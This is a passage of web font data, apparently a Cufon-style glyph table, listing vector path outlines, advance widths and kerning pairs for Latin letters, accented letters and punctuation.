,-37v-24,-1,-48,-41,-43,-68v0,-13,4,-95,71,-102r5,-32r23,0r-5,34v30,9,37,32,37,61r-40,3v0,-8,-1,-30,-16,-30"},{"d":"126,-85v-23,1,-60,-25,-67,-21v-13,0,-20,14,-25,22r-26,-21v24,-44,38,-67,94,-37v30,16,44,6,54,-14r26,22v-7,18,-20,49,-56,49"},{"d":"102,-130v-34,0,-58,-27,-58,-57v0,-30,24,-57,58,-57v32,0,59,25,59,56v0,33,-28,58,-59,58xm102,-158v15,0,28,-13,28,-29v0,-17,-13,-29,-28,-29v-16,0,-27,13,-27,29v0,15,11,29,27,29"},{"d":"31,-139r12,-101r44,0r-23,101r-33,0","w":79},{"d":"138,-131v-31,18,-47,19,-75,-6v-20,-43,-11,-107,51,-107v62,0,54,75,24,113xm112,-218v-22,2,-17,51,-19,57v0,11,3,16,10,16v15,0,18,-46,18,-55v0,-10,-1,-18,-9,-18"},{"d":"45,0r17,-101r-45,-139r52,0r27,90r52,-90r47,0r-83,141r-16,99r-51,0","w":165,"k":{"\u00fc":13,"\u00f6":18,"O":5,"\u00d8":5,"\u00d3":5,"\u00d4":5,"\u00d6":5,"\u00d2":5,"\u00d5":5,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11,",":18,".":18,"a":22,"\u00e6":22,"\u00e1":22,"\u00e2":22,"\u00e4":22,"\u00e0":22,"\u00e5":22,"\u00e3":22,"e":25,"\u00e9":25,"\u00ea":25,"\u00eb":25,"\u00e8":25,"i":-7,"\u00ed":-7,"\u00ee":-7,"\u00ef":-7,"\u00ec":-7,"o":18,"\u00f8":18,"\u00f3":18,"\u00f4":18,"\u00f2":18,"\u00f5":18,"u":13,"\u00fa":13,"\u00fb":13,"\u00f9":13}},{"d":"6,0r40,-240r50,0r-6,39v42,1,95,-10,95,67v0,23,-6,52,-26,66v-35,25,-53,15,-94,17r-9,51r-50,0xm72,-93v37,5,64,-7,62,-38v-2,-34,-25,-27,-51,-28"},{"d":"134,-56v9,-23,-47,-35,-47,-74v0,-21,7,-33,11,-38v25,-1,39,-14,39,-29v0,-11,-7,-20,-22,-20v-25,0,-29,21,-33,45r-32,191r-49,0r24,-144r-18,0r6,-38r18,0v6,-36,31,-90,90,-90v36,0,63,21,63,50v0,27,-25,56,-60,57v-4,23,66,28,57,75v0,30,-20,75,-72,75v-22,0,-35,-7,-42,-11r17,-31v6,4,13,8,24,8v23,0,26,-20,26,-26","w":190,"k":{"w":5}},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0xm120,-275v-18,10,-41,15,-71,13r75,-44r61,44v-28,2,-49,-3,-65,-13"},{"d":"33,0r33,-195r-51,0r8,-45r150,0r-7,45r-49,0r-33,195r-51,0","w":147,"k":{"\u00fc":20,"\u00f2":29,"\u00f6":29,"\u00e8":29,"\u00eb":29,"\u00ea":29,"\u00e3":34,"\u00e5":34,"\u00e0":34,"\u00e4":34,"\u00e2":34,"O":7,"\u00d8":7,"\u00d3":7,"\u00d4":7,"\u00d6":7,"\u00d2":7,"\u00d5":7,"w":27,"y":25,"\u00fd":25,"\u00ff":25,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11,",":16,".":16,"a":34,"\u00e6":34,"\u00e1":34,"e":29,"\u00e9":29,"o":29,"\u00f8":29,"\u00f3":29,"\u00f4":29,"\u00f5":29,"r":20,"u":20,"\u00fa":20,"\u00fb":20,"\u00f9":20,"-":14}},{"d":"79,60r13,-78v-9,13,-18,22,-35,22v-42,0,-48,-35,-48,-60v0,-7,1,-67,27,-103v11,-14,29,-23,48,-23v35,0,43,23,46,32v4,-8,7,-13,12,-27r27,0r-41,237r-49,0xm98,-55v3,-20,32,-96,-3,-96v-26,0,-36,67,-36,95v0,36,33,37,39,1","w":171},{"d":"140,-162v10,12,16,33,16,57v0,26,-9,109,-81,109v-5,0,-19,0,-36,-9r-12,19r-25,0r21,-33v-41,-67,4,-190,100,-156r12,-18r25,0xm111,-122r-53,87v23,19,37,4,47,-37v4,-17,6,-33,6,-50xm54,-63r50,-82v-22,-14,-39,2,-45,42v-2,10,-4,24,-5,40","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"197,-58r28,0r10,-53xm89,0r-32,0r161,-240r31,0xm214,0r6,-31r-57,0r4,-27r71,-86r35,0r-15,86r19,0r-4,27r-19,0r-5,31r-35,0xm22,-96r5,-29r27,0r12,-73v-7,5,-12,6,-33,6r6,-30v12,0,32,-2,42,-20r28,0r-19,117r26,0r-5,29r-89,0","w":300},{"d":"57,-177r12,106r41,-106r39,0r-78,183v-16,41,-35,62,-86,56r3,-37v30,4,40,-2,50,-32r-32,-170r51,0xm143,-231r-71,32r-10,-16r67,-42","w":135,"k":{",":16,".":16,"a":4,"\u00e6":4,"\u00e1":4,"\u00e2":4,"\u00e4":4,"\u00e0":4,"\u00e5":4,"\u00e3":4,"o":-7,"\u00f8":-7,"\u00f3":-7,"\u00f4":-7,"\u00f6":-7,"\u00f2":-7,"\u00f5":-7}},{"d":"139,-164v35,-34,108,-16,108,58v0,12,0,17,-1,25r-96,0v0,20,-8,51,21,51v17,0,22,-13,27,-30r41,7v-9,26,-24,57,-70,57v-35,0,-45,-19,-53,-36v-14,39,-110,62,-113,-10v11,-62,43,-63,104,-69v8,-19,-2,-45,-17,-41v-18,0,-22,17,-24,30r-45,-5v5,-18,15,-55,69,-55v30,0,41,10,49,18xm154,-109r50,0v2,-18,5,-43,-19,-43v-24,0,-30,33,-31,43xm103,-86v-29,3,-50,12,-50,40v0,9,4,20,17,20v22,0,26,-21,33,-60","w":257},{"d":"6,0r40,-240r50,0r-40,240r-50,0xm87,-256r-65,-27r16,-29r58,36","w":91},{"d":"45,0r17,-101r-45,-139r52,0r27,90r52,-90r47,0r-83,141r-16,99r-51,0xm187,-283r-76,27r-9,-18r73,-37","w":165,"k":{"O":5,"\u00d8":5,"\u00d3":5,"\u00d4":5,"\u00d6":5,"\u00d2":5,"\u00d5":5,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11,",":18,".":18,"a":22,"\u00e6":22,"\u00e1":22,"\u00e2":22,"\u00e4":22,"\u00e0":22,"\u00e5":22,"\u00e3":22,"e":25,"\u00e9":25,"\u00ea":25,"\u00eb":25,"\u00e8":25,"i":-7,"\u00ed":-7,"\u00ee":-7,"\u00ef":-7,"\u00ec":-7,"o":18,"\u00f8":18,"\u00f3":18,"\u00f4":18,"\u00f6":18,"\u00f2":18,"\u00f5":18,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13}},{"d":"3,0r30,-177r49,0r-30,177r-49,0xm78,-199r-59,-31r17,-27r52,39","w":86},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25xm123,-203v-16,0,-48,-25,-60,-2r-13,-15v6,-7,17,-20,35,-20v6,-3,32,14,39,12v11,0,17,-8,23,-15r14,15v-8,9,-22,25,-38,25","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm117,-199r-59,-31r18,-27r52,39","w":165},{"d":"158,-231r-71,32r-10,-16r67,-42","w":165},{"d":"120,-202v-46,0,-50,83,-50,118v0,18,3,45,28,45v30,0,37,-30,40,-47r-36,0r7,-43r83,0r-22,132r-21,0r-2,-31v-7,12,-20,32,-57,32v-69,0,-74,-61,-74,-94v0,-73,27,-154,106,-154v68,0,73,64,74,79r-47,8v-1,-12,-2,-45,-29,-45","w":202},{"d":"24,-96r5,-29r27,0r12,-73v-7,5,-12,6,-33,6r5,-30v12,0,32,-2,43,-20r28,0r-19,117r26,0r-5,29r-89,0","w":122},{"d":"138,0r-42,0r5,-28v-10,16,-21,32,-52,32v-44,0,-43,-29,-36,-71r18,-110r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0xm102,-199r-59,-31r17,-27r53,39","w":171},{"d":"17,55r-18,0r30,-55r-23,0r9,-53r49,0r-8,48","w":91,"k":{" ":18}},{"d":"57,-177r12,106r41,-106r39,0r-78,183v-16,41,-35,62,-86,56r3,-37v30,4,40,-2,50,-32r-32,-170r51,0xm62,-203v-11,0,-20,-9,-20,-19v0,-10,9,-19,20,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm118,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":135,"k":{",":16,".":16,"a":4,"\u00e6":4,"\u00e1":4,"\u00e2":4,"\u00e4":4,"\u00e0":4,"\u00e5":4,"\u00e3":4,"o":-7,"\u00f8":-7,"\u00f3":-7,"\u00f4":-7,"\u00f6":-7,"\u00f2":-7,"\u00f5":-7}},{"d":"23,-103r-20,0r6,-40r21,0r16,-97v46,2,74,-9,115,11v33,16,36,61,36,84v0,20,-3,99,-53,129v-42,25,-83,13,-138,16xm89,-200r-9,57r39,0r-6,40r-40,0r-10,63v24,2,43,-4,50,-15v20,-9,63,-165,-24,-145","w":202,"k":{"V":13,"W":14,"Y":13,"\u00dd":13,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":14,".":14}},{"d":"21,-96r5,-29r26,0r12,-73v-7,5,-11,6,-32,6r5,-30v12,0,31,-2,42,-20r29,0r-20,117r26,0r-5,29r-88,0xm89,0r-32,0r161,-240r32,0xm173,0r5,-32v24,-14,71,-48,71,-74v0,-2,0,-12,-11,-12v-13,0,-16,16,-17,25r-33,-7v2,-22,19,-47,52,-47v29,0,47,18,47,40v0,35,-35,57,-66,76r55,0r-5,31r-98,0","w":300},{"d":"66,-69r-51,0r4,-25r51,0v2,-8,-1,-15,-3,-22r-44,0r4,-25r33,0r-25,-99r49,0r19,98r45,-98r46,0r-54,99r39,0r-5,25r-48,0v-3,7,-8,12,-9,22r54,0r-5,25r-53,0r-11,69r-48,0"},{"d":"162,-117v-1,48,-13,121,-70,121v-26,0,-32,-14,-36,-23r-14,80r-49,0r51,-301r49,0r-14,82v5,-8,15,-24,38,-24v45,0,45,53,45,65xm97,-148v-36,9,-31,73,-36,98v0,3,0,20,16,20v31,0,36,-92,36,-96v0,-21,-14,-22,-16,-22","w":171},{"d":"117,-199r-59,-31r18,-27r52,39","w":165},{"d":"16,0r7,-42r43,0r23,-138v-13,13,-22,16,-54,16r8,-45v21,0,50,-5,67,-33r40,0r-33,200r41,0r-7,42r-135,0"},{"d":"3,0r30,-177r49,0r-30,177r-49,0xm37,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm93,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":86},{"d":"138,0r-42,0r5,-28v-10,16,-21,32,-52,32v-44,0,-43,-29,-36,-71r18,-110r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0xm80,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm136,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":171},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm78,-201r-35,0r65,-50r51,50r-31,0r-23,-18","w":165},{"d":"138,0r-42,0r5,-28v-10,16,-21,32,-52,32v-44,0,-43,-29,-36,-71r18,-110r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0xm161,-231r-70,32r-11,-16r67,-42","w":171},{"d":"175,-226r0,54r-99,51r99,51r0,53r-156,-82r0,-45"},{"d":"-34,63r7,-40v26,3,26,-2,33,-42r27,-158r49,0r-28,167v-5,55,-26,87,-88,73xm35,-194r8,-48r51,0r-8,48r-51,0","w":85},{"d":"33,58r8,-14v6,8,39,13,38,-3v2,-6,-13,-16,-27,-12r15,-29r18,0r-9,17v16,-3,31,3,31,21v0,29,-41,43,-74,20","w":165},{"d":"6,0r40,-240r142,0r-7,42r-92,0r-9,55r76,0r-7,40r-76,0r-10,61r93,0r-7,42r-143,0xm120,-275v-18,10,-41,15,-71,13r75,-44r61,44v-28,2,-49,-3,-65,-13","w":171},{"d":"27,-139r12,-101r44,0r-23,101r-33,0xm89,-139r12,-101r44,0r-23,101r-33,0","w":135},{"d":"6,0r40,-240r50,0r-40,240r-50,0xm137,-283r-77,27r-9,-18r74,-37","w":91},{"d":"72,-119v-28,0,-45,-26,-45,-50v0,-33,15,-75,54,-75v30,0,45,20,45,51v0,35,-18,74,-54,74xm81,-216v-20,0,-20,42,-21,52v0,3,0,17,12,17v20,0,20,-44,20,-47v0,-5,0,-22,-11,-22xm181,4v-28,0,-46,-25,-46,-50v0,-33,16,-75,55,-75v29,0,44,18,44,51v0,37,-18,74,-53,74xm181,-24v19,0,19,-35,20,-47v0,-5,-1,-22,-12,-22v-20,0,-30,69,-8,69xm62,0r-28,0r161,-240r28,0","w":251},{"d":"92,-182v49,1,71,44,62,101r-95,0v0,0,-9,45,19,51v17,0,24,-13,29,-30r40,7v-14,44,-38,57,-72,57v-48,0,-66,-23,-66,-76v0,-57,31,-110,83,-110xm63,-109r47,0v3,-16,7,-37,-18,-42v-22,0,-27,30,-29,42xm117,-199r-59,-31r18,-27r52,39","w":165,"k":{"y":5,"\u00fd":5,"\u00ff":5}},{"d":"44,-240r50,0r-23,133v-7,33,-6,68,24,68v28,0,31,-18,37,-55r25,-146r46,0v-17,74,-10,165,-49,220v-34,48,-144,26,-138,-38v6,-65,19,-121,28,-182xm98,-262v-11,0,-20,-8,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20xm154,-262v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20","w":196,"k":{"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9}},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43xm98,-262v-11,0,-20,-8,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20xm154,-262v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"182,-114r-43,0r-44,-88r-43,88r-43,0r68,-129r37,0"},{"d":"3,0r30,-177r49,0r-30,177r-49,0xm35,-194r8,-48r51,0r-8,48r-51,0","w":86},{"d":"4,61r-32,0r162,-301r33,0","w":159},{"d":"113,-245v27,0,68,18,68,57v0,42,-34,54,-42,57v9,5,30,16,30,55v0,48,-30,80,-85,80v-13,0,-78,-2,-78,-59v-1,-34,25,-58,49,-65v-41,-31,-26,-125,58,-125xm113,-145v29,-6,36,-70,-5,-69v-14,0,-30,10,-30,30v0,15,7,29,35,39xm80,-103v-30,6,-43,75,8,74v23,0,32,-16,32,-29v0,-15,-5,-29,-40,-45"},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm77,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm133,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":165},{"d":"120,-182v41,0,44,41,38,76r-18,106r-49,0r21,-130v0,-13,-12,-14,-15,-14v-20,0,-24,20,-29,48r-16,96r-49,0r30,-177r42,0r-4,28v5,-11,17,-33,49,-33xm127,-203v-17,0,-49,-25,-61,-2r-13,-15v6,-7,18,-20,36,-20v6,-3,31,12,38,12v11,0,17,-8,23,-15r14,15v-8,9,-21,25,-37,25","w":171,"k":{"y":7,"\u00fd":7,"\u00ff":7}},{"d":"6,0r40,-240r50,0r-16,96r60,0r16,-96r51,0r-41,240r-50,0r17,-102r-60,0r-17,102r-50,0","w":202},{"d":"138,0r-42,0r5,-28v-10,16,-21,32,-52,32v-44,0,-43,-29,-36,-71r18,-110r49,0r-21,130v0,13,12,14,16,14v20,0,24,-24,27,-42r17,-102r49,0xm82,-201r-36,0r66,-50r51,50r-32,0r-23,-18","w":171},{"d":"3,0r30,-177r49,0r-30,177r-49,0xm118,-231r-70,32r-11,-16r67,-42","w":86},{"d":"93,0r-48,0r9,-53r48,0xm169,-184v0,74,-67,57,-69,111r-44,0v3,-36,8,-52,31,-67v24,-16,33,-22,33,-42v0,-21,-12,-26,-22,-26v-23,0,-29,22,-33,37r-38,-12v10,-87,142,-82,142,-1","w":165},{"d":"174,0r-58,0r-19,-105r-29,36r-12,69r-50,0r40,-240r50,0r-17,103r71,-103r54,0r-69,89","k":{"O":14,"\u00d8":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"y":5,"\u00fd":5,"\u00ff":5,"e":5,"\u00e9":5,"\u00ea":5,"\u00eb":5,"\u00e8":5,"o":4,"\u00f8":4,"\u00f3":4,"\u00f4":4,"\u00f6":4,"\u00f2":4,"\u00f5":4}},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm107,-198v-19,0,-33,-16,-33,-33v0,-17,14,-33,33,-33v19,0,32,16,32,33v0,17,-13,33,-32,33xm107,-217v18,0,18,-28,0,-28v-20,0,-19,28,0,28","w":165},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25xm71,-201r-35,0r65,-50r51,50r-31,0r-23,-18","w":165,"k":{"w":9,"y":9,"\u00fd":9,"\u00ff":9,"g":9}},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43xm130,-256r-64,-27r15,-29r58,36","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43xm180,-283r-76,27r-10,-18r74,-37","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"3,0r30,-177r49,0r-30,177r-49,0xm39,-201r-35,0r65,-50r51,50r-31,0r-24,-18","w":86},{"d":"59,-146v-2,-53,16,-97,71,-98v50,0,57,38,59,47r-41,17v-3,-15,-8,-22,-18,-22v-28,0,-17,35,-22,56r35,0r-6,36r-30,0v-3,32,-13,50,-34,65v42,-1,68,6,79,-34r39,15v-33,100,-106,53,-201,64r7,-45v31,4,62,-3,61,-65r-25,0r6,-36r20,0"},{"d":"143,-240r27,240r-52,0r-5,-53r-60,0r-22,53r-47,0r106,-240r53,0xm110,-94r-6,-92r-35,92r41,0"},{"d":"6,0r40,-240r51,0r44,147r24,-147r42,0r-41,240r-39,0r-51,-174r-28,174r-42,0","w":202},{"d":"135,-65v-29,29,-60,13,-59,-26v0,-43,27,-93,63,-93v17,0,18,12,19,19r6,-16r28,0r-29,95v0,5,5,6,9,6v25,0,41,-32,41,-68v0,-43,-24,-72,-69,-72v-60,0,-97,54,-97,115v0,77,82,111,148,65r8,26v-78,48,-186,11,-186,-93v0,-72,50,-141,128,-141v48,0,98,29,98,97v0,46,-27,103,-80,100v-12,0,-24,-3,-28,-14xm136,-151v-15,0,-26,44,-26,56v0,5,1,11,7,11v18,0,28,-43,28,-54v0,-3,0,-13,-9,-13","w":245},{"d":"6,0r40,-240r50,0r-40,240r-50,0","w":91},{"d":"-21,0r85,-128r-40,-112r56,0r19,70r43,-70r50,0r-75,112r46,128r-57,0r-24,-86r-51,86r-52,0","w":171},{"d":"77,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm133,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":165},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40","w":165},{"d":"6,0r40,-240r51,0r44,147r24,-147r42,0r-41,240r-39,0r-51,-174r-28,174r-42,0xm155,-262v-18,0,-53,-24,-66,-2r-14,-16v20,-32,53,-20,80,-9v12,0,20,-9,26,-16r14,16v-10,11,-23,27,-40,27","w":202},{"d":"81,-243v15,-4,51,20,45,39v0,27,-19,31,-30,34v9,3,24,8,24,31v0,18,-11,46,-52,46v-44,0,-50,-27,-53,-43r32,-9v1,10,3,25,19,25v13,0,18,-10,18,-19v-2,-21,-18,-19,-30,-19r5,-25v15,0,29,3,31,-18v0,-3,-1,-15,-14,-15v-10,0,-14,8,-18,19r-30,-9v10,-33,39,-37,53,-37","w":122},{"d":"97,-146r43,-43r26,26r-43,43r43,43r-26,26r-43,-43r-43,43r-26,-26r43,-43r-43,-43r26,-26"},{"d":"92,-182v49,1,71,44,62,101r-95,0v0,0,-9,45,19,51v17,0,24,-13,29,-30r40,7v-14,44,-38,57,-72,57v-48,0,-66,-23,-66,-76v0,-57,31,-110,83,-110xm63,-109r47,0v3,-16,7,-37,-18,-42v-22,0,-27,30,-29,42xm71,-201r-35,0r65,-50r51,50r-31,0r-23,-18","w":165,"k":{"y":5,"\u00fd":5,"\u00ff":5}},{"d":"6,0r40,-240r50,0r-40,240r-50,0xm73,-275v-18,10,-40,16,-70,13r74,-44r61,44v-28,2,-49,-3,-65,-13","w":91},{"d":"91,-182v115,0,38,101,47,182r-47,0v-3,-9,-2,-14,0,-24v-6,10,-16,28,-46,28v-37,0,-42,-29,-42,-45v0,-66,76,-69,102,-70v6,-17,3,-41,-15,-41v-19,0,-22,19,-24,30r-45,-5v5,-19,15,-55,70,-55xm53,-46v0,10,5,20,17,20v22,0,25,-20,32,-60v-45,4,-49,33,-49,40xm123,-203v-16,0,-48,-25,-60,-2r-13,-15v6,-7,17,-20,35,-20v6,-3,32,14,39,12v11,0,17,-8,23,-15r14,15v-8,9,-22,25,-38,25","w":165},{"d":"66,61r-68,0r4,-22r24,0r43,-257r-28,0r4,-22r71,0","w":116},{"d":"6,0r40,-240r135,0r-7,42r-85,0r-10,59r73,0r-7,43r-73,0r-16,96r-50,0","w":159,"k":{"\u00eb":4,"\u00e3":9,"\u00e0":9,"\u00e4":9,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18,",":27,".":27,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e5":9,"e":4,"\u00e9":4,"\u00ea":4,"\u00e8":4,"i":-9,"\u00ed":-9,"\u00ee":-9,"\u00ef":-9,"\u00ec":-9,"o":4,"\u00f8":4,"\u00f3":4,"\u00f4":4,"\u00f6":4,"\u00f2":4,"\u00f5":4,"r":7}},{"d":"6,0r40,-240r50,0r-33,198r77,0r-7,42r-127,0","w":147,"k":{"T":22,"V":32,"W":25,"y":14,"\u00fd":14,"\u00ff":14,"Y":29,"\u00dd":29}},{"d":"46,0r-32,0r21,-73r-24,0r8,-30r25,0r11,-38r-24,0r8,-30r25,0r20,-69r32,0r-20,69r31,0r21,-69r32,0r-20,69r24,0r-9,30r-24,0r-11,38r24,0r-8,30r-25,0r-21,73r-32,0r21,-73r-31,0xm109,-103r11,-38r-34,0r-11,38r34,0"},{"d":"81,-67r-72,0r7,-39r71,0","w":98},{"d":"1,0r7,-49v23,-15,117,-80,117,-130v0,-9,-5,-23,-21,-23v-25,0,-30,34,-32,46r-47,-11v4,-38,29,-77,80,-77v43,0,72,26,72,65v0,36,-20,64,-52,92v-9,8,-15,11,-62,44r95,0r-7,43r-150,0"},{"d":"41,-13r-15,20r-31,0r31,-42v-10,-22,-11,-51,-11,-56v0,-56,24,-153,105,-153v17,0,33,5,47,15r15,-20r30,0r-29,40v25,66,13,121,-18,174v-32,55,-94,43,-124,22xm64,-84r75,-110v-27,-32,-57,12,-62,34v-9,36,-12,57,-13,76xm148,-163r-78,113v8,15,22,15,25,15v17,0,34,-7,47,-72v5,-26,7,-42,6,-56","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"94,4v-67,0,-78,-52,-78,-94v0,-59,24,-154,104,-154v11,0,50,1,65,38v24,57,11,124,-19,172v-22,35,-54,38,-72,38xm117,-202v-47,11,-50,89,-50,125v0,19,7,38,30,38v45,0,45,-97,47,-120v0,-6,0,-43,-27,-43xm146,-262v-18,0,-53,-24,-66,-2r-14,-16v20,-32,53,-20,80,-9v12,0,20,-9,26,-16r14,16v-10,11,-23,27,-40,27","w":202,"k":{"T":11,"V":11,"W":9,"Y":16,"\u00dd":16,"A":9,"\u00c6":9,"\u00c1":9,"\u00c2":9,"\u00c4":9,"\u00c0":9,"\u00c5":9,"\u00c3":9,",":7,".":7,"J":11,"X":7}},{"d":"19,-17r0,-54r99,-50r-99,-52r0,-53r156,82r0,45"},{"d":"6,0r40,-240r50,0r-40,240r-50,0xm48,-262v-11,0,-21,-8,-21,-20v0,-11,10,-20,21,-20v11,0,19,10,19,20v0,11,-8,20,-19,20xm103,-262v-11,0,-20,-9,-20,-20v0,-11,9,-20,20,-20v11,0,20,10,20,20v0,11,-9,20,-20,20","w":91},{"d":"6,0r40,-240r74,0r12,150r62,-150r74,0r-40,240r-51,0r35,-197r-83,197r-30,0r-21,-195r-30,195r-42,0","w":263},{"d":"6,0r40,-240v66,5,143,-23,143,56v0,46,-32,56,-42,59v11,3,36,11,36,50v0,23,-9,50,-30,62v-41,22,-92,10,-147,13xm90,-202r-10,59v27,-1,58,8,58,-33v0,-29,-25,-26,-48,-26xm74,-105r-11,66v33,-2,67,11,67,-38v0,-34,-29,-27,-56,-28","w":196},{"d":"125,-14v-35,24,-58,29,-95,3v-20,-14,-21,-42,-21,-61v0,-47,21,-110,84,-110v49,0,63,38,63,77v0,24,-6,65,-31,91xm75,-30v25,0,31,-73,31,-89v0,-12,0,-29,-15,-29v-29,0,-32,80,-32,93v0,15,3,25,16,25xm77,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19xm133,-203v-11,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,19,9,19,19v0,10,-8,19,-19,19","w":165,"k":{"w":9,"y